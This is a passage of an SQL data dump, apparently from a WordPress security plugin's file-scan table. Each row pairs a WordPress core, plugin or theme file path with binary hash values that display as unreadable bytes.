��l�Q��1','\nT��x��N�@��s_��L`�E*�d���H�c?','',0,'?'),('=S�6�a��Xo�,�2','wp-content/plugins/wordfence/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�V8�\\���Bs','7�h�����>8b�ut^^�Rx�26�#i(�','',0,'?'),('=c���J��_�J���v','wp-content/themes/sg-window/Untitled-2.html',0,'*3}q��cWn�>���','*3}q��cWn�>���','�l��u��Tq�b�3���;�>��$�T\0	�>','',0,'?'),('=d1��E��J܉��','wp-includes/wp-includes/js/wp-embed.js',0,'#�N�O8L^�sWkJ�<','#�N�O8L^�sWkJ�<','�� �E��>�@_�0���!�B����5','',0,'?'),('=f�u�A><Th���@','wp-includes/js/jquery/ui/progressbar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�sk�����Z�j	Y','���7���v��\r6��1��N9@v�7�$�a��','',0,'?'),('=��Сs���zb��','wp-includes/wp-includes/js/jcrop/jquery.Jcrop.min.css',0,'V̞��/K�x����','V̞��/K�x����','�2�S�[�6Dv�5bs��=���NL�w����','',0,'?'),('=�)_��th<V�а','wp-content/themes/sg-window/img/404.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yy+��8i�Y�`','!]�����h�~��](h����\"�ծ','',0,'?'),('=��k�[4��� ��=�','wp-includes/comment-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��|?�M��=]J��','�4x��������!Gk˙���Lto�!��\'�#','',0,'?'),('=��Ө��\0E���','wp-includes/blocks/verse/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h�h>��K3���u1','��ߋ�!�;n�^�u|ا�$Y0�56��4�','',0,'?'),('=�;�{���e�6�5�','wp-includes/js/jquery/ui/effect-pulsate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*\r�I�͕;t��W��','�����BD8�=~�b���wJ=�� ǐ�E��','',0,'?'),('=�F�혣�Æ��K&�','wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9�:7���]6hVo��','߫��/Lk����OT�bdS�EiL9���~8','',0,'?'),('=噄\nA�K(���l','wp-includes/js/dist/keyboard-shortcuts.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&C(F�Y���jF��','��p�r�|��%v5�\\^@aì@M��󀹊#�','',0,'?'),('=�a������0&','wp-includes/js/jquery/ui/effect-slide.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a�d��{2װ�','T�f��b������>�s;X<`0��<9��:�','',0,'?'),('>$��2�0�v~�&jCi','wp-content/themes/sg-window/img/icons/small/facebook.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��x�坥I}�=�$','y²l+a�Wd���\\Wɷng�dQ��+��','',0,'?'),('>5��ˏ.y2Q[ڣ�1�','wp-includes/blocks/block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i8��X�3����cTD','�J���$_�F�$o�����{�fC�~L�3��<','',0,'?'),('>@�e�T$q��Q��d','wp-includes/wp-includes/vars.php',0,'�\Zm���f1q��˴','�\Zm���f1q��˴','�nl\Z���h�1he�-�M��5�Nl��bd�Hpz�','',0,'?'),('>G��O�jP�l���B','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�����\'Ρ0�g2','ؚx\"�o�*I�\nQ��j�����T(�G\Z�.�\Z','',0,'?'),('>d�RLډDh�uJH���','wp-content/plugins/wp-cerber/assets/bn5ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڑ����@�/�@�','\0�o �~�}�2�,_*Í {J�O�4SfY��','',0,'?'),('>hЩ�XX*�v1���','wp-includes/theme-compat/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ϫ�-�Y�D��s��','���A8}���G(oܵ����SQ��:z��b','',0,'?'),('>ql�+�m�\05Ħ\"�^','wp-includes/js/customize-preview.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tQ��M�ʈ�����','��=��y�0��RAB�b����)�?=�n�','',0,'?'),('>��X�\r�b��ڟ�$W','wp-includes/class-wp-image-editor-gd.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�RŖ���z`�T��','�	U� 5�BOu��>F���p_��}�d�.��','',0,'?'),('>���\n�3��7���','wp-includes/wp-includes/Requests/Exception/HTTP/304.php',0,'�;F4�A�I���T�','�;F4�A�I���T�','v��C���	a�\'F�;���z���(eJ��L','',0,'?'),('>��y��K��j�|','wp-content/themes/sg-window/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o®&�W3�$�Z���(	','.�ڻ�M_?�m���A��cޫ��d\'�V����','',0,'?'),('>��m\\Vӻ���R3','wp-includes/wp-includes/images/media/default.png',0,'-����I�B�h�@���b','-����I�B�h�@���b',':�oL�JDj�$->�i��\'�6n֠��Ui','',0,'?'),('?�ke�zC��\"!�@�','wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','89�\"��zz��Vv*��]','�ۆ%%l�:J�f<�bq��P���Pt˯}ߝ\"�f','',0,'?'),('?2yT!s|��t��u}','wp-includes/random_compat/random_bytes_dev_urandom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d�����\ZHr�','\nDfdvP�f�On:����a��г‘���X�','',0,'?'),('??Q$�P���.:X6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-fast.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0@�I�SB','�1����đ���,�h�-��h�>fھ�G]','',0,'?'),('?U������\'_l.�p','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o>B��	����IN�-y','��hl�[�������(�l~�Q�u�FM�	�','',0,'?'),('?Yv�q_����ۮXO','wp-content/plugins/wordfence/images/sort_both.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�B�Qx�SV.D','����6��\"@X�g\'�W7��w��gJ���q','',0,'?'),('?]�P�.��1����2b','wp-includes/js/tinymce/plugins/textcolor/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%i�3����f����','(��EL����b[��K�!s�ӊ�nIJ��','',0,'?'),('?���Z���8.���G','wp-content/plugins/wp-cerber/assets/flags/ec.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�׏* �k&�(ʬjJ�','Bd=�Zj?r/{��\Z���7MF��\'��n-Zi��','',0,'?'),('?��=�@�M�$#��P7','wp-includes/js/dist/html-entities.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӻ9 f�T�R�dW','��N�6�(�r��/���BϡKl�[��','',0,'?'),('?�I��8G?ՔB[��','wp-includes/wp-includes/registration-functions.php',0,'�Q<۾\Z7�M�v��','�Q<۾\Z7�M�v��','Kd���_�MF� X��X�.,\'T\\��6���6','',0,'?'),('@)�u��X�tȤ�0�','wp-content/plugins/wp-cerber/assets/flags/ng.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�mBC@�͚���','���H�!R�Ɂ=[�?aq�μYو�_hw��','',0,'?'),('@L<��m�^��c��Ic','wp-content/plugins/wp-cerber/assets/flags/bb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0��(�zc�q','7!Ky�=�]b\neO-3{/Q��ȳ�Rҳ��L','',0,'?'),('@V�$�K���<�1*�','wp-includes/css/jquery-ui-dialog.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S`���7у�-�','j�&�Ұ�M������u�@��6L}�5����{','',0,'?'),('@Y�ӓ�\\˳c�z�','wp-includes/wp-includes/images/down_arrow.gif',0,'���V�~�o�YnG~_u','���V�~�o�YnG~_u','��h�8ɧ���p�u�{�9������J���','',0,'?'),('@`c����:|�\\����5','wp-includes/wp-includes/Requests/Exception/HTTP/505.php',0,'�]A	3�[/Cd���','�]A	3�[/Cd���','��⭛� i�{�PA�͆k���d���M\n���','',0,'?'),('@k/�����I�?T,','wp-includes/js/jquery/ui/datepicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4}�aX2nH��GWx�{','/4XAJ\Z����o>V��ꔆ�I����','',0,'?'),('@��̘9�#�L�y(��','wp-includes/images/arrow-pointer-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��b�·*L���[��','����fb�ZD1.���V��aw�4l?��p�G^�{','',0,'?'),('@���8��\"��% �','wp-includes/wp-includes/images/smilies/icon_mad.gif',0,'V�!�@�c�0�S�','V�!�@�c�0�S�','�������d[O:LJ�����jl}�q�','',0,'?'),('@��L���:���(���','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/psalm-autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��\0�6�&�	�','uj���v��d_���=\n�2fY+��V\\��','',0,'?'),('@��_/��d=���','wp-includes/wp-includes/class-wp-recovery-mode-link-service.php',0,'�����}f/c�nx5','�����}f/c�nx5','�k�������ޙ(Z��t�M\0��;�t\r','',0,'?'),('@��\Z!z��r���W��p','wp-content/plugins/wordfence/views/waf/option-rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.Գ� <`�ϒ&�','V5��;����S6��,�Uft��Yn`A','',0,'?'),('@�XD\n�\nRN��t���','wp-admin/images/menu.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�9#�d�Y`	���','�l��IE/(�p��\0�pn�T-O�z\"],=`�','',0,'?'),('@�ȯ��&O�o���','wp-content/plugins/wordfence/lib/noc1.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9e�b\0��PO�����','_�u���j������P��-KOA�ܫ�����','',0,'?'),('@ɰktg��\r�힒�','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js',0,'.�2ң��A�!�V0I','.�2ң��A�!�V0I','�\"CG9^��ȷ�1��a�?�a�uk`','',0,'?'),('@�L��߯7�٭kقE','wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R١��.�1&;�@','Y>]��B�A���u��5u�6�jT�6��d\rr+','',0,'?'),('@�;5�X��V��O�Z','wp-admin/images/mask.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���g~�\"��J��䩎�','��/<s�ԡ�)�\'�.�1��jkn�K9Q���','',0,'?'),('@�m����O��W','wp-admin/admin-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E�����Lv��','v�����tQ�+4&f�d�1��Z�6LI�=�','',0,'?'),('@�t�R>G�Hh��ס','wp-admin/css/revisions-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�=���a�-�II','7G�V����ԉͦE<����x�Z)��:�%','',0,'?'),('@�aMI�3&��]}','wp-includes/wp-includes/IXR/class-IXR-client.php',0,'�a���J�}��!�W��','�a���J�}��!�W��','Yw��1��v.�G3e�d��Ä��y`LR	]','',0,'?'),('@�s�Z��^����q�v','wp-admin/images/media-button-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�WI��\\��?��','�<�:��tn�kb�wi�&��	��R����\Z','',0,'?'),('@��+�T΄\'����٤','wp-includes/ID3/module.audio.flac.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-�ל�/f��T�@','�_d�s�`C�Ro\Z-��Y/�X{��Bƛ�,O�','',0,'?'),('A�lA~i^����u�Ø','wp-admin/css/customize-nav-menus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(RroΡC\r�\n�F�+�','��ﴖ�ș*���t�Q��zWÆ�ײU','',0,'?'),('Aw�fh�b�H�˟�f','wp-content/themes/sg-window/img/2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_36��,���t�h\Z�t','�o�}��[U���~�M�&�e�\"\"�4�:;;F;l�','',0,'?'),('AE���[�`����','wp-includes/js/thickbox/thickbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|}�\Zc�%��9j��','��b?/a#�׼�h�l��������\rk���','',0,'?'),('A(�pp!�\n�m�Y��{�','wp-content/themes/sg-window/inc/widget-items-products.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Eh�x���\\���Y','!�2m�]��CI���Ѿv�]�\\c�Ư����','',0,'?'),('A;�ت\Z���ܦ�z�','wp-includes/sodium_compat/lib/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{�#��l�>m','��ٹmc(�l��\'�mt�ˣ�[��g��W','',0,'?'),('AK<���j���gsr�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��Kb(�\\��p�B-','�ճ* ʰ	���[q��˜P���k�','',0,'?'),('AV�_tIC�@UU���','wp-includes/wp-includes/css/dist/components/style.min.css',0,'c��`=\"����y�)','c��`=\"����y�)','�xp�3�>9eQ<�jCQ���g@M�/�w','',0,'?'),('Aa�@J������Ł�','wp-includes/js/tinymce/plugins/colorpicker/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' C��ȭ?d�{׭V��','���B��R�\0�!�䄚����Q�����\'5w','',0,'?'),('As�v���g�4U�','wp-includes/js/dist/nux.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m742T�T�K{��','���>6����]z�Էv����N햜g\r(�','',0,'?'),('A{&� ��V>��Νs','wp-admin/css/login-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N -?�6�>��9�A͘','!�;#Q%BX\"GҵWM��>���a���T��37D','',0,'?'),('A4�f+N����*�','wp-includes/wp-includes/block-supports/colors.php',0,'�Ef�1!9vC8�:(��\'','�Ef�1!9vC8�:(��\'','Uc�OТ��0;�[�z\'��أdP��+�j���0','',0,'?'),('A�Kd��\n6���','wp-includes/wp-includes/customize/class-wp-customize-partial.php',0,'J@�N-p<�1]\Z�n�','J@�N-p<�1]\Z�n�','ƪ�㫾������s�uu��nΐ\0��V<1�r','',0,'?'),('A�[\Zϸ�.�e���','wp-includes/wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js',0,'Ғ:�K�[�Iw\\��g�','Ғ:�K�[�Iw\\��g�','`e��	�n��O���JM�%�N�hA�{gh�f','',0,'?'),('Aػ#���\"���j�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�\\�ס\0�Ӹ���\Z�','؉(U�G�g�L��춗ږ\'GmD����','',0,'?'),('A�\\ݛ���-��7\Z�1','wp-content/plugins/wp-cerber/assets/flags/kh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*\0B/\ro��5��;�','m~�~�����B���)��~����D?��ID','',0,'?'),('A��W�`롢P�,Z8�','wp-includes/wp-includes/wp-db.php',0,'��yAS9�ie��P�','��yAS9�ie��P�','����I�&���e�*��7�K38�����','',0,'?'),('A��\n7H;W��_��L�I','wp-includes/wp-includes/js/tinymce/plugins/directionality/plugin.js',0,'&�\"�X	& )��=ʀ$','&�\"�X	& )��=ʀ$','�&�[�@��5��(��cv��L��YI6�B;)-','',0,'?'),('B^��t�p�k���!�','wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�*L�TG��4%P���','-������n�F�J�&T�P�o\\ϓ\\����2���','',0,'?'),('B$�[\nfIZ&��[','wp-content/plugins/wp-cerber/assets/flags/na.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��� B�z�z��Q�\"�','���5�������o�]�-� �)�Qb~��\0�','',0,'?'),('BJ��O������z�D�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{�1�MR�KE_�/','|q�UUѿÎ|z��G>*�ۜ\"���I����;�','',0,'?'),('BS�@]K)e�(&��gH','wp-includes/wp-includes/IXR/class-IXR-value.php',0,'��f�>�5l�j\0f�','��f�>�5l�j\0f�','�?h����͇ X��UP�O|H$�1���','',0,'?'),('BUj�v\\ѣ����(�','wp-content/plugins/wordfence/views/common/license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:8�����^�r','�f�B�-h������^�>A���nH0�\r&��','',0,'?'),('Bcx���_`��}Nd�','wp-content/themes/sg-window/img/back.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uñ�}9d_=������','��,Q�\0VKĊ��.�f�/\"���%(�F','',0,'?'),('B��j�)��q�D�S','wp-admin/install-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�Aoq�+C2Xd��','�W>�;��%֏6s�%T���v��#o(ʓ�','',0,'?'),('B��A�z��mvs���\r,','wp-includes/wp-includes/rewrite.php',0,'7\0B6\"��–�7��X�','7\0B6\"��–�7��X�','�\n����בu��������5$E��i�4I�d','',0,'?'),('B����Q���aU�%','wp-content/plugins/wordfence/views/scanner/issue-knownfile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G^=�p�=$��\Z�2','�RK�6�����N\"3*\"�J�/0i�x0�','',0,'?'),('B���_�罬b���v��','wp-includes/wp-includes/Requests/Exception/Transport.php',0,'��l��z�� J�^�','��l��z�� J�^�','����ĺ�̌��&���ֳ���4@78���p','',0,'?'),('Bϵ���H@x���/','wp-content/plugins/wordfence/waf/pomo/po.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�vc+p*�\"G��?�B','�MO(��� G\rkHԽ�eq��	�Lj�F�o�O�-','',0,'?'),('B�P�X�W��6��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �QA�L���󚜆U�','���G��\n<.\ZW�r���ʪ��Ø�)','',0,'?'),('C�q����X�U��N=6','wp-includes/wp-includes/Requests/Proxy/HTTP.php',0,'���/2��������)','���/2��������)','J�6d��A��l{��Й\0������J��h','',0,'?'),('CG���Ֆ{@�}V�\'u','wp-content/themes/sg-window/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'x8v����*�RU�b','�����_Wt�÷�_thYO���-|�9�o','',0,'?'),('Cڗ�i���F!�','wp-includes/wp-includes/js/jquery/ui/spinner.js',0,'�8��TXi�M�Y�','�8��TXi�M�Y�','�>�qJط���0� �\'���R\'n�7s�b3|','',0,'?'),('C&���p�b���1','wp-content/themes/sg-window/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^`�x7�Sz��	','��E��Ñ,�J�����G5�S��E�v�F�S','',0,'?'),('CC?����c:�W=طEf','wp-includes/wp-includes/sodium_compat/namespaced/Core/Util.php',0,';��*�kLwB��d�=',';��*�kLwB��d�=','ec[d�M?H�|�KY�\04��@� QA��:FF �','',0,'?'),('Cc�iF��h�.n7�','wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�����)<�Q2�İ��','Pp�y�C���W7i~��g��`�����','',0,'?'),('C���I���S7�<','wp-content/plugins/wordfence/modules/login-security/views/page/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ш>\\g��ǡ�$��c�','��ii��G�C����N�FL�)7%�ʙ�','',0,'?'),('C�3?�ݳ�4]x�','wp-includes/wp-includes/customize/class-wp-customize-upload-control.php',0,'ؓ�B8�?)ivr��`-�','ؓ�B8�?)ivr��`-�','�~t~��X���% ��K/3-n6\0�RB�֨G�','',0,'?'),('C��/�@�l��Y��2}','wp-includes/css/dist/format-library/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k(O�1m<�0v��vV','���1�q�XX|ί}Cw�}�o�]5F\n�~��','',0,'?'),('C�g;f\"�>E��׷��','wp-includes/wp-includes/js/underscore.js',0,'�����$b��Z�C','�����$b��Z�C','�8A�2�xz��\0<G-�E	��r��쇮?�R�','',0,'?'),('C�ؚ�T�R�!vF{','wp-includes/customize/class-wp-customize-nav-menu-item-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*:Uț�J>��h�z','=��C����\0\"ȗ�gp�{��K�ϮD�\'�','',0,'?'),('Cۧ��7CvKw�ᔠ@�','wp-includes/wp-includes/css/dist/components/style-rtl.min.css',0,'\\�t�<���l�j�!','\\�t�<���l�j�!','QR0�2�>�S��\\���}�a�sz9�<','',0,'?'),('C�=ʓ�me������','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php',0,'�C�Ǻ\Z��.��զ','�C�Ǻ\Z��.��զ','ڟXZfd�ޱEd4�z%��×\0cKc�J�l^','',0,'?'),('C��s\\�\n���s��\'m','wp-content/plugins/wordfence/lib/menu_tools_whois.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bR��\'~��f�_D�','\Z�G�X\'~S�_AF��)t�iw�k�PELX6','',0,'?'),('Dm�\n��z�H��S���','wp-includes/images/crystal/document.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'^c�s���D��3T\\','g�t�( Ŏ�k`5͒��J��M5���:j�','',0,'?'),('D ��\"�F�����E��','wp-includes/wp-includes/blocks/categories/block.json',0,'A؂Gd�r�zQ���','A؂Gd�r�zQ���','\"|��\'��Ru�G ��� W�T{�I�9C�R\\R�','',0,'?'),('D-\Z�:����Xs���','wp-includes/wp-includes/js/quicktags.min.js',0,'	�w.PX�Mɇs�K!','	�w.PX�Mɇs�K!','_1��T��)��U�k�`{��,�;�k��o�','',0,'?'),('D.��:�\0��S�R8','wp-includes/ID3/module.audio-video.asf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�Oo�x�&]��\\L','͆%F	��/\r���:�����0;>�_M3��w�','',0,'?'),('D0T����3�yW\"�','wp-includes/wp-includes/sodium_compat/src/Core/X25519.php',0,'pZ�����:!�ټ�','pZ�����:!�ټ�','3�l�@���o�-�3���S���Տ&�!��','',0,'?'),('D6m�e�r{pK�O�','wp-includes/locale.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ʋ\04�)o�ybU^�','�<�6n�\'�J�����_��	�S%��GVJ','',0,'?'),('DU���uZ�F���Z','wp-content/plugins/wp-cerber/assets/flags/no.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j.��#�0�P','2�!��u��6#=�%�ӹO���C4�	\Z���rM�','',0,'?'),('Dm��u�ϣ�!�I�5H�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pٽ��P��]G���','�|�� )��Y�M��,3���0���\Z*�9�p','',0,'?'),('D���u�\r�‹�ɲ\Z','wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4Z?d����⢡','1XaRpLrIO%�%|\r��Vge\0�-b�^�n�=�','',0,'?'),('D����)ba�k��{��','wp-admin/includes/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�\np�Z�,���v�','k�_DRH{���\0�#�6Z�~�}����u��V�','',0,'?'),('D�<�$��8Z�o�','wp-includes/wp-includes/blocks/quote/block.json',0,'N`�^/��(��ǝ2�=','N`�^/��(��ǝ2�=','/{��Oe;gt@aݸG	�/1Sv>��e̢kE','',0,'?'),('Dչ�����$Oa����','wp-admin/css/colors/ectoplasm/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�S�S�_�Y�_3�f','ib��������itYz�Q.��F0��O^','',0,'?'),('D�E.Gྠb9k�8L=','wp-content/plugins/wp-cerber/assets/flags/hk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i.�@������C�_','�52Kx襹���*��Ȫ��b�B;b��*��\"�','',0,'?'),('D�T[�-��U���','wp-content/plugins/wordfence/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','($h�c���1�h��','=zQ�o��5�?\0�d�_�\r���V5�M�j�N�?�','',0,'?'),('D��5\n\'�\\��~W��','wp-includes/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`��k�3wh��k�͔','G�>�F|59��~�q|\n&\0��R	l�','',0,'?'),('D�%X��\0T\\7���I�','wp-content/plugins/wordfence/modules/login-security/css/admin.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�%v#)��ݩ5��!�','B��i�x�����u\n�1܎ͺ2��{�','',0,'?'),('E�f�iL����&���','wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php',0,'*5���^gG�o<NN','*5���^gG�o<NN','5�\'4ϣ�j3Ò�NjX�CU�!�����]~','',0,'?'),('E#���-v37�6�Ť','wp-content/plugins/wordfence/wordfence.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F(e����韲7\Z.�','c�eEjˉ�\n��#;񐼽{��gul��r�p','',0,'?'),('E4��fu\r#R:k!jgh','wp-includes/js/wp-list-revisions.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}�\Z�ۦ_��8K',']\r��o�8�Y�6��)ryW?�Y�����b�z(','',0,'?'),('E5�;����tR���$L�','wp-includes/js/dist/element.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�%L��ѹE!��','��rJ�L^>ui��Ob�1�DƖ�>��!E','',0,'?'),('Eh�������@aq��','wp-includes/session.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�NRM��<\\����>��','}����k+8M�U=<;��t����I*,�4#�','',0,'?'),('E��(�zRA1;eN�qD3','wp-content/plugins/wordfence/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��e��ª��\\�og','�� ��o���M�J#�A|�ߎ�(��;6R\n�','',0,'?'),('E�im�/��f\\��8+Z','wp-content/plugins/wp-cerber/assets/flags/gl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8�+xO,�o*�}9','J\'�Ѫ��(�6���֌�臚#��{�dp�I�','',0,'?'),('E�}�~��M��-�]�a','wp-admin/css/widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xl�Y}���q�\r���7$','��w�?�Z�L\0�ì*8��L_���5��`��','',0,'?'),('E�n=>����.���;f','wp-includes/wp-includes/js/dist/data-controls.min.js',0,']���p���\r��sµ',']���p���\r��sµ','�ӝk?������?���d�<���vc','',0,'?'),('E�V��,�%��,SM=','wp-admin/ms-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P3�\n��7|L?MtA���','a����c�sc\Z���\"�V�L\\�њ�','',0,'?'),('E�B3A���-\r�&!�T','wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�o��y�벍cK�',':P��cc�z�\"�����Q�a���QZ�d','',0,'?'),('E�Dc�9�>��	��v','wp-content/plugins/wp-cerber/nexus/cerber-nexus-slave.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h9�H��듦)�x��','pYq�e�\'I\n:�\0�y%G�C-|M�gf��','',0,'?'),('E�e&��0�\'�0��٣','wp-content/plugins/wp-cerber/assets/flags/ga.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`#�HG�)����4X�','�NvX���aa 	%�Q�U�SJX;M.G�j','',0,'?'),('E�H��vYt���<\0	','wp-includes/wp-includes/blocks/search/block.json',0,'�虚-�.�\Z��2	�','�虚-�.�\Z��2	�','޻O�ͯ�G�2�\n�ɣ~�V��\Z6��|x','',0,'?'),('F�Hȝl�e��#�','wp-includes/js/tinymce/skins/wordpress/images/more-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l,��r�%�^x�%','���Y=�_�b��|ʧ&f,��<�������','',0,'?'),('Fq�����E؇��','wp-content/plugins/wp-cerber/assets/ui-stack.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N3�ߪ���(Q','�\"%cb�[$2��\Z��\rN�w`� �?&�L�\\','',0,'?'),('F\r�x�w~�\rܱ��\n�','wp-includes/widgets/class-wp-widget-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}��z�Ys��]�','H:�wn����n8V��